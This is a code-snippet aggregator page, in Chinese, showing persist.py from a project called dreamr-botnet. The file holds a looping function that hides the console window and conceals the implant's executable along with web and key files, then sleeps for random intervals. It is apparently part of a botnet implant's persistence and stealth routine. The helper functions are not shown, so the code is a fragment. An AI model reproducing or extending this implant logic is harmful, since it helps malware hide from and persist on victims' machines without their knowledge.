persist.py 文件源码

python
阅读 22 收藏 0 点赞 0 评论 0

项目:dreamr-botnet 作者: YinAndYangSecurityAwareness 项目源码 文件源码
def run(self):
        while (True):
            if not DEBUG_MODE:

                # keep implant implanted
                print("insist must persist")
                window = win32console.GetConsoleWindow()
                win32gui.ShowWindow(window, False)

                # Things that we really do want to stash away somewhere
                hideFile(WebPath[:1]) # slashes
                hideFile(KeyPath[:1])
                hideFile(sys.argv[0])
            time.sleep(random.randint(1, 420))
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号